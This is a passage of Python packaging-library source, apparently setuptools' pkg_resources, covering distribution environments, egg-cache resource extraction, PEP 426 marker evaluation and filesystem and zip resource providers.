    def __getstate__(self):
        # Copy all mutable state so the pickled/copied snapshot is
        # independent of later mutation of this working set.
        return (
            self.entries[:], self.entry_keys.copy(), self.by_key.copy(),
            self.callbacks[:]
        )
    def __setstate__(self, e_k_b_c):
        entries, keys, by_key, callbacks = e_k_b_c
        self.entries = entries[:]
        self.entry_keys = keys.copy()
        self.by_key = by_key.copy()
        self.callbacks = callbacks[:]
class Environment(object):
    """Searchable snapshot of distributions on a search path"""
    # NOTE: the `platform` and `python` defaults below are evaluated once,
    # at class-definition time, pinning them to the importing interpreter.
    def __init__(self, search_path=None, platform=get_supported_platform(), python=PY_MAJOR):
        """Snapshot distributions available on a search path
        Any distributions found on `search_path` are added to the environment.
        `search_path` should be a sequence of ``sys.path`` items. If not
        supplied, ``sys.path`` is used.
        `platform` is an optional string specifying the name of the platform
        that platform-specific distributions must be compatible with. If
        unspecified, it defaults to the current platform. `python` is an
        optional string naming the desired version of Python (e.g. ``'3.3'``);
        it defaults to the current version.
        You may explicitly set `platform` (and/or `python`) to ``None`` if you
        wish to map *all* distributions, not just those compatible with the
        running platform or Python version.
        """
        # key -> list of distributions; lists in _cache are kept sorted.
        self._distmap = {}
        self._cache = {}
        self.platform = platform
        self.python = python
        self.scan(search_path)
    def can_add(self, dist):
        """Is distribution `dist` acceptable for this environment?
        The distribution must match the platform and python version
        requirements specified when this environment was created, or False
        is returned.
        """
        return (self.python is None or dist.py_version is None
                or dist.py_version==self.python) \
            and compatible_platforms(dist.platform,self.platform)
    def remove(self, dist):
        """Remove `dist` from the environment"""
        self._distmap[dist.key].remove(dist)
    def scan(self, search_path=None):
        """Scan `search_path` for distributions usable in this environment
        Any distributions found are added to the environment.
        `search_path` should be a sequence of ``sys.path`` items. If not
        supplied, ``sys.path`` is used. Only distributions conforming to
        the platform/python version defined at initialization are added.
        """
        if search_path is None:
            search_path = sys.path
        for item in search_path:
            for dist in find_distributions(item):
                self.add(dist)
    def __getitem__(self,project_name):
        """Return a newest-to-oldest list of distributions for `project_name`
        """
        try:
            return self._cache[project_name]
        except KeyError:
            # Keys are stored lower-cased; retry with the normalized name.
            project_name = project_name.lower()
            if project_name not in self._distmap:
                return []
        if project_name not in self._cache:
            dists = self._cache[project_name] = self._distmap[project_name]
            _sort_dists(dists)
        return self._cache[project_name]
    def add(self,dist):
        """Add `dist` if we ``can_add()`` it and it isn't already added"""
        if self.can_add(dist) and dist.has_version():
            dists = self._distmap.setdefault(dist.key,[])
            if dist not in dists:
                dists.append(dist)
                # Keep any cached per-project list in sorted order.
                if dist.key in self._cache:
                    _sort_dists(self._cache[dist.key])
    def best_match(self, req, working_set, installer=None):
        """Find distribution best matching `req` and usable on `working_set`
        This calls the ``find(req)`` method of the `working_set` to see if a
        suitable distribution is already active. (This may raise
        ``VersionConflict`` if an unsuitable version of the project is already
        active in the specified `working_set`.) If a suitable distribution
        isn't active, this method returns the newest distribution in the
        environment that meets the ``Requirement`` in `req`. If no suitable
        distribution is found, and `installer` is supplied, then the result of
        calling the environment's ``obtain(req, installer)`` method will be
        returned.
        """
        dist = working_set.find(req)
        if dist is not None:
            return dist
        # self[req.key] is newest-to-oldest, so the first match is the best.
        for dist in self[req.key]:
            if dist in req:
                return dist
        return self.obtain(req, installer) # try and download/install
    def obtain(self, requirement, installer=None):
        """Obtain a distribution matching `requirement` (e.g. via download)
        Obtain a distro that matches requirement (e.g. via download). In the
        base ``Environment`` class, this routine just returns
        ``installer(requirement)``, unless `installer` is None, in which case
        None is returned instead. This method is a hook that allows subclasses
        to attempt other ways of obtaining a distribution before falling back
        to the `installer` argument."""
        if installer is not None:
            return installer(requirement)
    def __iter__(self):
        """Yield the unique project names of the available distributions"""
        for key in self._distmap.keys():
            if self[key]: yield key
    def __iadd__(self, other):
        """In-place addition of a distribution or environment"""
        if isinstance(other,Distribution):
            self.add(other)
        elif isinstance(other,Environment):
            for project in other:
                for dist in other[project]:
                    self.add(dist)
        else:
            raise TypeError("Can't add %r to environment" % (other,))
        return self
    def __add__(self, other):
        """Add an environment or distribution to an environment"""
        # The result is unfiltered (platform=None, python=None) so nothing
        # from either operand is dropped.
        new = self.__class__([], platform=None, python=None)
        for env in self, other:
            new += env
        return new
AvailableDistributions = Environment # XXX backward compatibility
# Raised by ResourceManager.extraction_error() when a resource cannot be
# unpacked to the egg cache.
class ExtractionError(RuntimeError):
    """An error occurred extracting a resource
    The following attributes are available from instances of this exception:
    manager
        The resource manager that raised this exception
    cache_path
        The base directory for resource extraction
    original_error
        The exception instance that caused extraction to fail
    """
class ResourceManager:
    """Manage resource extraction and packages"""
    # Base directory for extraction; None means "use get_default_cache()".
    extraction_path = None
    def __init__(self):
        # Paths handed out by get_cache_path(), for possible cleanup later.
        self.cached_files = {}
    def resource_exists(self, package_or_requirement, resource_name):
        """Does the named resource exist?"""
        return get_provider(package_or_requirement).has_resource(resource_name)
    def resource_isdir(self, package_or_requirement, resource_name):
        """Is the named resource an existing directory?"""
        return get_provider(package_or_requirement).resource_isdir(
            resource_name
        )
    def resource_filename(self, package_or_requirement, resource_name):
        """Return a true filesystem path for specified resource"""
        return get_provider(package_or_requirement).get_resource_filename(
            self, resource_name
        )
    def resource_stream(self, package_or_requirement, resource_name):
        """Return a readable file-like object for specified resource"""
        return get_provider(package_or_requirement).get_resource_stream(
            self, resource_name
        )
    def resource_string(self, package_or_requirement, resource_name):
        """Return specified resource as a string"""
        return get_provider(package_or_requirement).get_resource_string(
            self, resource_name
        )
    def resource_listdir(self, package_or_requirement, resource_name):
        """List the contents of the named resource directory"""
        return get_provider(package_or_requirement).resource_listdir(
            resource_name
        )
    def extraction_error(self):
        """Give an error message for problems extracting file(s)"""
        # Wrap the in-flight exception in an ExtractionError that carries
        # enough context for the user to fix the cache directory.
        old_exc = sys.exc_info()[1]
        cache_path = self.extraction_path or get_default_cache()
        err = ExtractionError("""Can't extract file(s) to egg cache
The following error occurred while trying to extract file(s) to the Python egg
cache:
%s
The Python egg cache directory is currently set to:
%s
Perhaps your account does not have write access to this directory? You can
change the cache directory by setting the PYTHON_EGG_CACHE environment
variable to point to an accessible directory.
""" % (old_exc, cache_path)
        )
        err.manager = self
        err.cache_path = cache_path
        err.original_error = old_exc
        raise err
    def get_cache_path(self, archive_name, names=()):
        """Return absolute location in cache for `archive_name` and `names`
        The parent directory of the resulting path will be created if it does
        not already exist. `archive_name` should be the base filename of the
        enclosing egg (which may not be the name of the enclosing zipfile!),
        including its ".egg" extension. `names`, if provided, should be a
        sequence of path name parts "under" the egg's extraction location.
        This method should only be called by resource providers that need to
        obtain an extraction location, and only for names they intend to
        extract, as it tracks the generated names for possible cleanup later.
        """
        extract_path = self.extraction_path or get_default_cache()
        target_path = os.path.join(extract_path, archive_name+'-tmp', *names)
        try:
            _bypass_ensure_directory(target_path)
        except:
            # Any failure is re-raised as an ExtractionError with context.
            self.extraction_error()
        self._warn_unsafe_extraction_path(extract_path)
        self.cached_files[target_path] = 1
        return target_path
    @staticmethod
    def _warn_unsafe_extraction_path(path):
        """
        If the default extraction path is overridden and set to an insecure
        location, such as /tmp, it opens up an opportunity for an attacker to
        replace an extracted file with an unauthorized payload. Warn the user
        if a known insecure location is used.
        See Distribute #375 for more details.
        """
        if os.name == 'nt' and not path.startswith(os.environ['windir']):
            # On Windows, permissions are generally restrictive by default
            # and temp directories are not writable by other users, so
            # bypass the warning.
            return
        mode = os.stat(path).st_mode
        if mode & stat.S_IWOTH or mode & stat.S_IWGRP:
            msg = ("%s is writable by group/others and vulnerable to attack "
                "when "
                "used with get_resource_filename. Consider a more secure "
                "location (set with .set_extraction_path or the "
                "PYTHON_EGG_CACHE environment variable)." % path)
            warnings.warn(msg, UserWarning)
    def postprocess(self, tempname, filename):
        """Perform any platform-specific postprocessing of `tempname`
        This is where Mac header rewrites should be done; other platforms don't
        have anything special they should do.
        Resource providers should call this method ONLY after successfully
        extracting a compressed resource. They must NOT call it on resources
        that are already in the filesystem.
        `tempname` is the current (temporary) name of the file, and `filename`
        is the name it will be renamed to by the caller after this routine
        returns.
        """
        if os.name == 'posix':
            # Make the resource executable
            # (hex constants avoid py2/py3 octal-literal syntax differences)
            mode = ((os.stat(tempname).st_mode) | 0x16D) & 0xFFF # 0555, 07777
            os.chmod(tempname, mode)
    def set_extraction_path(self, path):
        """Set the base path where resources will be extracted to, if needed.
        If you do not call this routine before any extractions take place, the
        path defaults to the return value of ``get_default_cache()``. (Which
        is based on the ``PYTHON_EGG_CACHE`` environment variable, with various
        platform-specific fallbacks. See that routine's documentation for more
        details.)
        Resources are extracted to subdirectories of this path based upon
        information given by the ``IResourceProvider``. You may set this to a
        temporary directory, but then you must call ``cleanup_resources()`` to
        delete the extracted files when done. There is no guarantee that
        ``cleanup_resources()`` will be able to remove all extracted files.
        (Note: you may not change the extraction path for a given resource
        manager once resources have been extracted, unless you first call
        ``cleanup_resources()``.)
        """
        if self.cached_files:
            raise ValueError(
                "Can't change extraction path, files already extracted"
            )
        self.extraction_path = path
    def cleanup_resources(self, force=False):
        """
        Delete all extracted resource files and directories, returning a list
        of the file and directory names that could not be successfully removed.
        This function does not have any concurrency protection, so it should
        generally only be called when the extraction path is a temporary
        directory exclusive to a single process. This method is not
        automatically called; you must call it explicitly or register it as an
        ``atexit`` function if you wish to ensure cleanup of a temporary
        directory used for extractions.
        """
        # XXX
def get_default_cache():
    """Determine the default cache location
    This returns the ``PYTHON_EGG_CACHE`` environment variable, if set.
    Otherwise, on Windows, it returns a "Python-Eggs" subdirectory of the
    "Application Data" directory. On all other systems, it's "~/.python-eggs".
    """
    try:
        return os.environ['PYTHON_EGG_CACHE']
    except KeyError:
        pass
    if os.name!='nt':
        return os.path.expanduser('~/.python-eggs')
    # Windows: probe progressively less-specific environment variables to
    # locate a per-user data directory.
    app_data = 'Application Data' # XXX this may be locale-specific!
    app_homes = [
        (('APPDATA',), None), # best option, should be locale-safe
        (('USERPROFILE',), app_data),
        (('HOMEDRIVE','HOMEPATH'), app_data),
        (('HOMEPATH',), app_data),
        (('HOME',), None),
        (('WINDIR',), app_data), # 95/98/ME
    ]
    for keys, subdir in app_homes:
        dirname = ''
        for key in keys:
            if key in os.environ:
                dirname = os.path.join(dirname, os.environ[key])
            else:
                # A variable in this combination is missing; try the next.
                break
        else:
            if subdir:
                dirname = os.path.join(dirname,subdir)
            return os.path.join(dirname, 'Python-Eggs')
    else:
        # BUGFIX: corrected typo "enviroment" -> "environment" in the
        # user-facing error message.
        raise RuntimeError(
            "Please set the PYTHON_EGG_CACHE environment variable"
        )
def safe_name(name):
    """Convert an arbitrary string to a standard distribution name
    Any runs of non-alphanumeric/. characters are replaced with a single '-'.
    """
    # Compile the class of disallowed characters, then collapse each run.
    disallowed = re.compile('[^A-Za-z0-9.]+')
    return disallowed.sub('-', name)
def safe_version(version):
    """Convert an arbitrary string to a standard version string
    Spaces become dots, and all other non-alphanumeric characters become
    dashes, with runs of multiple dashes condensed to a single dash.
    """
    dotted = version.replace(' ', '.')
    # Each run of characters outside [A-Za-z0-9.] collapses to one dash.
    return re.sub('[^A-Za-z0-9.]+', '-', dotted)
def safe_extra(extra):
    """Convert an arbitrary string to a standard 'extra' name
    Any runs of non-alphanumeric characters are replaced with a single '_',
    and the result is always lowercased.
    """
    # Lowercasing before substitution is equivalent to after: case changes
    # never move a character across the allowed/disallowed boundary.
    return re.sub('[^A-Za-z0-9.]+', '_', extra.lower())
def to_filename(name):
    """Convert a project or version name to its filename-escaped form
    Any '-' characters are currently replaced with '_'.
    """
    return '_'.join(name.split('-'))
class MarkerEvaluation(object):
    # Maps PEP 426 marker variable names to zero-argument callables that
    # produce the corresponding value for the running interpreter/platform.
    values = {
        'os_name': lambda: os.name,
        'sys_platform': lambda: sys.platform,
        'python_full_version': lambda: sys.version.split()[0],
        'python_version': lambda:'%s.%s' % (sys.version_info[0], sys.version_info[1]),
        'platform_version': platform.version,
        'platform_machine': platform.machine,
        'python_implementation': platform.python_implementation,
    }
    @classmethod
    def is_invalid_marker(cls, text):
        """
        Validate text as a PEP 426 environment marker; return an exception
        if invalid or False otherwise.
        """
        try:
            cls.evaluate_marker(text)
        except SyntaxError:
            # sys.exc_info() instead of "except ... as e" keeps this
            # compatible with very old Python versions.
            return cls.normalize_exception(sys.exc_info()[1])
        return False
    @staticmethod
    def normalize_exception(exc):
        """
        Given a SyntaxError from a marker evaluation, normalize the error message:
        - Remove indications of filename and line number.
        - Replace platform-specific error messages with standard error messages.
        """
        subs = {
            'unexpected EOF while parsing': 'invalid syntax',
            'parenthesis is never closed': 'invalid syntax',
        }
        # Mutates and returns the same exception object.
        exc.filename = None
        exc.lineno = None
        exc.msg = subs.get(exc.msg, exc.msg)
        return exc
    @classmethod
    def and_test(cls, nodelist):
        # MUST NOT short-circuit evaluation, or invalid syntax can be skipped!
        # operator.and_ is bitwise '&', which on bools yields a bool; every
        # odd-indexed child (the operands) is interpreted before combining.
        return functools.reduce(operator.and_, [cls.interpret(nodelist[i]) for i in range(1,len(nodelist),2)])
    @classmethod
    def test(cls, nodelist):
        # MUST NOT short-circuit evaluation, or invalid syntax can be skipped!
        # operator.or_ is bitwise '|', which on bools yields a bool.
        return functools.reduce(operator.or_, [cls.interpret(nodelist[i]) for i in range(1,len(nodelist),2)])
    @classmethod
    def atom(cls, nodelist):
        """Interpret an 'atom' grammar node; only parenthesized groups are
        permitted inside environment markers."""
        t = nodelist[1][0]
        if t == token.LPAR:
            if nodelist[2][0] == token.RPAR:
                raise SyntaxError("Empty parentheses")
            return cls.interpret(nodelist[2])
        raise SyntaxError("Language feature not supported in environment markers")
    @classmethod
    def comparison(cls, nodelist):
        """Interpret a single (non-chained) comparison grammar node."""
        if len(nodelist)>4:
            raise SyntaxError("Chained comparison not allowed in environment markers")
        comp = nodelist[2][1]
        cop = comp[1]
        if comp[0] == token.NAME:
            # Two-token operators ('not in', 'is not') arrive split; rebuild
            # the canonical spelling before the lookup below.
            if len(nodelist[2]) == 3:
                if cop == 'not':
                    cop = 'not in'
                else:
                    cop = 'is not'
        try:
            cop = cls.get_op(cop)
        except KeyError:
            raise SyntaxError(repr(cop)+" operator not allowed in environment markers")
        return cop(cls.evaluate(nodelist[1]), cls.evaluate(nodelist[3]))
    @classmethod
    def get_op(cls, op):
        """Map a grammar symbol or operator string to its handler.
        Symbol-keyed entries dispatch grammar nodes to the interpreting
        classmethods; string-keyed entries are the comparison operators
        allowed in environment markers. Raises KeyError for anything else.
        """
        ops = {
            symbol.test: cls.test,
            symbol.and_test: cls.and_test,
            symbol.atom: cls.atom,
            symbol.comparison: cls.comparison,
            'not in': lambda x, y: x not in y,
            'in': lambda x, y: x in y,
            '==': operator.eq,
            '!=': operator.ne,
        }
        # 'or_test' only exists as a distinct symbol on some grammar versions.
        if hasattr(symbol, 'or_test'):
            ops[symbol.or_test] = cls.test
        return ops[op]
    @classmethod
    def evaluate_marker(cls, text, extra=None):
        """
        Evaluate a PEP 426 environment marker on CPython 2.4+.
        Return a boolean indicating the marker result in this environment.
        Raise SyntaxError if marker is invalid.

        This implementation uses the 'parser' module, which is not implemented
        on Jython and has been superseded by the 'ast' module in Python 2.6 and
        later.
        """
        # totuple(1) keeps line-number info; [1] skips the top-level wrapper node
        return cls.interpret(parser.expr(text).totuple(1)[1])
    @classmethod
    def _markerlib_evaluate(cls, text):
        """
        Evaluate a PEP 426 environment marker using markerlib.
        Return a boolean indicating the marker result in this environment.
        Raise SyntaxError if marker is invalid.
        """
        import _markerlib
        # markerlib implements Metadata 1.2 (PEP 345) environment markers.
        # Translate the variables to Metadata 2.0 (PEP 426).
        env = _markerlib.default_environment()
        for key in env.keys():
            new_key = key.replace('.', '_')
            env[new_key] = env.pop(key)
        try:
            result = _markerlib.interpret(text, env)
        except NameError:
            # unknown marker variable -> surface as a marker syntax error
            e = sys.exc_info()[1]
            raise SyntaxError(e.args[0])
        return result
    if 'parser' not in globals():
        # Fall back to less-complete _markerlib implementation if 'parser' module
        # is not available (e.g. on Jython, where it is not implemented).
        evaluate_marker = _markerlib_evaluate
    @classmethod
    def interpret(cls, nodelist):
        """Dispatch a parse-tree node to the handler for its grammar symbol."""
        # collapse single-child wrapper nodes down to the significant node
        while len(nodelist)==2: nodelist = nodelist[1]
        try:
            op = cls.get_op(nodelist[0])
        except KeyError:
            raise SyntaxError("Comparison or logical expression expected")
        return op(nodelist)
    @classmethod
    def evaluate(cls, nodelist):
        """Evaluate a terminal: a known environment name or a plain string."""
        # collapse single-child wrapper nodes
        while len(nodelist)==2: nodelist = nodelist[1]
        kind = nodelist[0]
        name = nodelist[1]
        if kind==token.NAME:
            try:
                op = cls.values[name]
            except KeyError:
                raise SyntaxError("Unknown name %r" % name)
            return op()
        if kind==token.STRING:
            s = nodelist[1]
            # reject unquoted text, triple-quoted strings and escape sequences
            if s[:1] not in "'\"" or s.startswith('"""') or s.startswith("'''") \
                    or '\\' in s:
                raise SyntaxError(
                    "Only plain strings allowed in environment markers")
            # strip the surrounding quotes
            return s[1:-1]
        raise SyntaxError("Language feature not supported in environment markers")
# Module-level convenience aliases for the MarkerEvaluation classmethods.
invalid_marker = MarkerEvaluation.is_invalid_marker
evaluate_marker = MarkerEvaluation.evaluate_marker
class NullProvider:
    """Try to implement resources and metadata for arbitrary PEP 302 loaders"""

    # Filled in by subclasses; a bare NullProvider has no egg metadata.
    egg_name = None
    egg_info = None
    loader = None

    def __init__(self, module):
        self.loader = getattr(module, '__loader__', None)
        self.module_path = os.path.dirname(getattr(module, '__file__', ''))

    def get_resource_filename(self, manager, resource_name):
        return self._fn(self.module_path, resource_name)

    def get_resource_stream(self, manager, resource_name):
        return BytesIO(self.get_resource_string(manager, resource_name))

    def get_resource_string(self, manager, resource_name):
        return self._get(self._fn(self.module_path, resource_name))

    def has_resource(self, resource_name):
        return self._has(self._fn(self.module_path, resource_name))

    def has_metadata(self, name):
        return self.egg_info and self._has(self._fn(self.egg_info,name))

    if sys.version_info <= (3,):
        def get_metadata(self, name):
            if not self.egg_info:
                return ""
            return self._get(self._fn(self.egg_info,name))
    else:
        def get_metadata(self, name):
            if not self.egg_info:
                return ""
            # on Python 3, metadata is text; stored bytes are UTF-8
            return self._get(self._fn(self.egg_info,name)).decode("utf-8")

    def get_metadata_lines(self, name):
        return yield_lines(self.get_metadata(name))

    def resource_isdir(self,resource_name):
        return self._isdir(self._fn(self.module_path, resource_name))

    def metadata_isdir(self,name):
        return self.egg_info and self._isdir(self._fn(self.egg_info,name))

    def resource_listdir(self,resource_name):
        return self._listdir(self._fn(self.module_path,resource_name))

    def metadata_listdir(self,name):
        if self.egg_info:
            return self._listdir(self._fn(self.egg_info,name))
        return []

    def run_script(self,script_name,namespace):
        """Execute the named metadata script in `namespace`."""
        # scripts live in the egg metadata under 'scripts/<name>'
        script = 'scripts/'+script_name
        if not self.has_metadata(script):
            raise ResolutionError("No script named %r" % script_name)
        # normalize line endings before compiling
        script_text = self.get_metadata(script).replace('\r\n','\n')
        script_text = script_text.replace('\r','\n')
        script_filename = self._fn(self.egg_info,script)
        namespace['__file__'] = script_filename
        if os.path.exists(script_filename):
            execfile(script_filename, namespace, namespace)
        else:
            # script exists only inside the archive: prime linecache so
            # tracebacks can still display the source lines
            from linecache import cache
            cache[script_filename] = (
                len(script_text), 0, script_text.split('\n'), script_filename
            )
            script_code = compile(script_text,script_filename,'exec')
            exec(script_code, namespace, namespace)

    # The hooks below must be supplied by a subclass registered for a
    # concrete loader type (filesystem, zipfile, ...).

    def _has(self, path):
        raise NotImplementedError(
            "Can't perform this operation for unregistered loader type"
        )

    def _isdir(self, path):
        raise NotImplementedError(
            "Can't perform this operation for unregistered loader type"
        )

    def _listdir(self, path):
        raise NotImplementedError(
            "Can't perform this operation for unregistered loader type"
        )

    def _fn(self, base, resource_name):
        # join a '/'-separated resource name onto a platform path
        if resource_name:
            return os.path.join(base, *resource_name.split('/'))
        return base

    def _get(self, path):
        if hasattr(self.loader, 'get_data'):
            return self.loader.get_data(path)
        raise NotImplementedError(
            "Can't perform this operation for loaders without 'get_data()'"
        )
# NullProvider is the fallback for any loader type not registered below.
register_loader_type(object, NullProvider)
class EggProvider(NullProvider):
    """Provider based on a virtual filesystem"""

    def __init__(self, module):
        NullProvider.__init__(self, module)
        self._setup_prefix()

    def _setup_prefix(self):
        """Locate the containing .egg (if any) and record its name/root."""
        # we assume here that our metadata may be nested inside a "basket"
        # of multiple eggs; that's why we use module_path instead of .archive
        path = self.module_path
        previous = None
        # walk up the path until it stops changing (i.e. filesystem root)
        while path != previous:
            if path.lower().endswith('.egg'):
                self.egg_name = os.path.basename(path)
                self.egg_info = os.path.join(path, 'EGG-INFO')
                self.egg_root = path
                break
            previous = path
            path, _ = os.path.split(path)
class DefaultProvider(EggProvider):
    """Provides access to package resources in the filesystem"""

    def _has(self, path):
        return os.path.exists(path)

    def _isdir(self, path):
        return os.path.isdir(path)

    def _listdir(self, path):
        return os.listdir(path)

    def get_resource_stream(self, manager, resource_name):
        return open(self._fn(self.module_path, resource_name), 'rb')

    def _get(self, path):
        # read the whole file as bytes, always closing the handle
        stream = open(path, 'rb')
        try:
            data = stream.read()
        finally:
            stream.close()
        return data
# pkgutil reports None as the "loader" for plain filesystem paths, so
# DefaultProvider handles ordinary (non-zipped) packages.
register_loader_type(type(None), DefaultProvider)

if importlib_bootstrap is not None:
    register_loader_type(importlib_bootstrap.SourceFileLoader, DefaultProvider)
class EmptyProvider(NullProvider):
    """Provider that returns nothing for all requests"""

    module_path = None

    def _has(self, path):
        return False
    # directories behave exactly like files here: nothing exists
    _isdir = _has

    def _get(self, path):
        return ''

    def _listdir(self, path):
        return []

    def __init__(self):
        # deliberately skip NullProvider.__init__: there is no module
        pass
# Shared singleton used whenever a Distribution has no metadata provider.
empty_provider = EmptyProvider()
def build_zipmanifest(path):
    """
    Build a dictionary similar to the zipimport directory caches, except
    that it maps each archive-relative path (with '/' replaced by os.sep)
    to the entry's ``zipfile.ZipInfo`` object instead of a plain tuple.
    """
    manifest = {}
    archive = zipfile.ZipFile(path)
    # ZipFile has no __exit__ on some supported Pythons (e.g. 3.1),
    # so close it explicitly instead of using a with-statement.
    try:
        for item in archive.namelist():
            key = item.replace('/', os.sep)
            manifest[key] = archive.getinfo(item)
            assert manifest[key] is not None
    finally:
        archive.close()
    return manifest
class ZipProvider(EggProvider):
    """Resource support for zips and eggs"""

    # cached list of "eager" resource names; see _get_eager_resources
    eagers = None

    def __init__(self, module):
        EggProvider.__init__(self,module)
        self.zipinfo = build_zipmanifest(self.loader.archive)
        # prefix (archive path + separator) common to every virtual path
        self.zip_pre = self.loader.archive+os.sep

    def _zipinfo_name(self, fspath):
        # Convert a virtual filename (full path to file) into a zipfile subpath
        # usable with the zipimport directory cache for our target archive
        if fspath.startswith(self.zip_pre):
            return fspath[len(self.zip_pre):]
        raise AssertionError(
            "%s is not a subpath of %s" % (fspath,self.zip_pre)
        )

    def _parts(self,zip_path):
        # Convert a zipfile subpath into an egg-relative path part list
        fspath = self.zip_pre+zip_path # pseudo-fs path
        if fspath.startswith(self.egg_root+os.sep):
            return fspath[len(self.egg_root)+1:].split(os.sep)
        raise AssertionError(
            "%s is not a subpath of %s" % (fspath,self.egg_root)
        )

    def get_resource_filename(self, manager, resource_name):
        """Extract the resource to the local cache and return its filename."""
        if not self.egg_name:
            raise NotImplementedError(
                "resource_filename() only supported for .egg, not .zip"
            )
        # no need to lock for extraction, since we use temp names
        zip_path = self._resource_to_zip(resource_name)
        eagers = self._get_eager_resources()
        if '/'.join(self._parts(zip_path)) in eagers:
            # an "eager" resource requires all eager resources to be
            # extracted together (e.g. native libs plus their data files)
            for name in eagers:
                self._extract_resource(manager, self._eager_to_zip(name))
        return self._extract_resource(manager, zip_path)

    @staticmethod
    def _get_date_and_size(zip_stat):
        """Return (mtime-as-timestamp, size) for a ZipInfo entry."""
        size = zip_stat.file_size
        # ymdhms+wday, yday, dst
        date_time = zip_stat.date_time + (0, 0, -1)
        #1980 offset already done
        timestamp = time.mktime(date_time)
        return timestamp, size

    def _extract_resource(self, manager, zip_path):
        """Extract `zip_path` (file or directory) into the extraction cache."""
        if zip_path in self._index():
            # directory entry: extract each child, return the directory name
            for name in self._index()[zip_path]:
                last = self._extract_resource(
                    manager, os.path.join(zip_path, name)
                )
            return os.path.dirname(last)  # return the extracted directory name

        timestamp, size = self._get_date_and_size(self.zipinfo[zip_path])

        if not WRITE_SUPPORT:
            raise IOError('"os.rename" and "os.unlink" are not supported '
                          'on this platform')
        try:
            real_path = manager.get_cache_path(
                self.egg_name, self._parts(zip_path)
            )

            if self._is_current(real_path, zip_path):
                return real_path

            # write to a temp name, then atomically rename into place, so
            # concurrent extractors never observe a partially-written file
            outf, tmpnam = _mkstemp(".$extract", dir=os.path.dirname(real_path))
            os.write(outf, self.loader.get_data(zip_path))
            os.close(outf)
            # match the archive's timestamp so _is_current can compare mtimes
            utime(tmpnam, (timestamp,timestamp))
            manager.postprocess(tmpnam, real_path)

            try:
                rename(tmpnam, real_path)

            except os.error:
                if os.path.isfile(real_path):
                    if self._is_current(real_path, zip_path):
                        # the file became current since it was checked above,
                        # so proceed.
                        return real_path

                    elif os.name=='nt': # Windows, del old file and retry
                        unlink(real_path)
                        rename(tmpnam, real_path)
                        return real_path
                raise

        except os.error:
            manager.extraction_error() # report a user-friendly error

        return real_path

    def _is_current(self, file_path, zip_path):
        """
        Return True if the file_path is current for this zip_path
        """
        timestamp, size = self._get_date_and_size(self.zipinfo[zip_path])
        if not os.path.isfile(file_path):
            return False
        stat = os.stat(file_path)
        # size/mtime check is a cheap pre-filter before comparing contents
        if stat.st_size!=size or stat.st_mtime!=timestamp:
            return False
        # check that the contents match
        zip_contents = self.loader.get_data(zip_path)
        f = open(file_path, 'rb')
        file_contents = f.read()
        f.close()
        return zip_contents == file_contents

    def _get_eager_resources(self):
        # Eager resource names are listed in egg metadata; cache the
        # combined list on first use.
        if self.eagers is None:
            eagers = []
            for name in ('native_libs.txt', 'eager_resources.txt'):
                if self.has_metadata(name):
                    eagers.extend(self.get_metadata_lines(name))
            self.eagers = eagers
        return self.eagers

    def _index(self):
        # Lazily build and cache a mapping of directory -> child names for
        # every path in the archive, including implicit parent directories.
        try:
            return self._dirindex
        except AttributeError:
            ind = {}
            for path in self.zipinfo:
                parts = path.split(os.sep)
                while parts:
                    parent = os.sep.join(parts[:-1])
                    if parent in ind:
                        # parent already known: just record this child
                        ind[parent].append(parts[-1])
                        break
                    else:
                        # new parent: record child, then walk up a level
                        ind[parent] = [parts.pop()]
            self._dirindex = ind
            return ind

    def _has(self, fspath):
        zip_path = self._zipinfo_name(fspath)
        # a path "exists" if it is a file entry or an (implicit) directory
        return zip_path in self.zipinfo or zip_path in self._index()

    def _isdir(self,fspath):
        return self._zipinfo_name(fspath) in self._index()

    def _listdir(self,fspath):
        return list(self._index().get(self._zipinfo_name(fspath), ()))

    def _eager_to_zip(self,resource_name):
        return self._zipinfo_name(self._fn(self.egg_root,resource_name))

    def _resource_to_zip(self,resource_name):
        return self._zipinfo_name(self._fn(self.module_path,resource_name))
# Zip archives (eggs on sys.path) are served by ZipProvider.
register_loader_type(zipimport.zipimporter, ZipProvider)
class FileMetadata(EmptyProvider):
    """Metadata handler for standalone PKG-INFO files

    Usage::

        metadata = FileMetadata("/path/to/PKG-INFO")

    This provider rejects all data and metadata requests except for PKG-INFO,
    which is treated as existing, and will be the contents of the file at
    the provided location.
    """

    def __init__(self, path):
        self.path = path

    def has_metadata(self, name):
        return name == 'PKG-INFO'

    def get_metadata(self, name):
        """Return the PKG-INFO file contents; raise KeyError for other names."""
        if name != 'PKG-INFO':
            raise KeyError("No metadata except PKG-INFO is available")
        # universal-newline mode so CR/LF variants all read cleanly;
        # try/finally fixes a file-handle leak when read() raises
        f = open(self.path, 'rU')
        try:
            return f.read()
        finally:
            f.close()

    def get_metadata_lines(self, name):
        return yield_lines(self.get_metadata(name))
class PathMetadata(DefaultProvider):
    """Metadata provider for egg directories

    Usage::

        # Development eggs:

        egg_info = "/path/to/PackageName.egg-info"
        base_dir = os.path.dirname(egg_info)
        metadata = PathMetadata(base_dir, egg_info)
        dist_name = os.path.splitext(os.path.basename(egg_info))[0]
        dist = Distribution(basedir,project_name=dist_name,metadata=metadata)

        # Unpacked egg directories:

        egg_path = "/path/to/PackageName-ver-pyver-etc.egg"
        metadata = PathMetadata(egg_path, os.path.join(egg_path,'EGG-INFO'))
        dist = Distribution.from_filename(egg_path, metadata=metadata)
    """

    def __init__(self, path, egg_info):
        # `path` is the importable directory; `egg_info` holds the metadata
        self.module_path = path
        self.egg_info = egg_info
class EggMetadata(ZipProvider):
    """Metadata provider for .egg files"""

    def __init__(self, importer):
        """Create a metadata provider from a zipimporter"""
        self.zipinfo = build_zipmanifest(importer.archive)
        self.zip_pre = importer.archive + os.sep
        self.loader = importer
        # a non-empty prefix means the egg is nested inside the archive
        self.module_path = (
            os.path.join(importer.archive, importer.prefix)
            if importer.prefix else importer.archive
        )
        self._setup_prefix()
# Registry mapping importer types to distribution-finder callables.
_declare_state('dict', _distribution_finders = {})
def register_finder(importer_type, distribution_finder):
    """Register `distribution_finder` to find distributions in sys.path items

    `importer_type` is the type or class of a PEP 302 "Importer" (sys.path item
    handler), and `distribution_finder` is a callable that, passed a path
    item and the importer instance, yields ``Distribution`` instances found on
    that path item. See ``pkg_resources.find_on_path`` for an example."""
    _distribution_finders[importer_type] = distribution_finder
def find_distributions(path_item, only=False):
    """Yield distributions accessible via `path_item`"""
    item_importer = get_importer(path_item)
    # pick the registered finder best matching this importer's type
    find = _find_adapter(_distribution_finders, item_importer)
    return find(item_importer, path_item, only)
def find_eggs_in_zip(importer, path_item, only=False):
    """
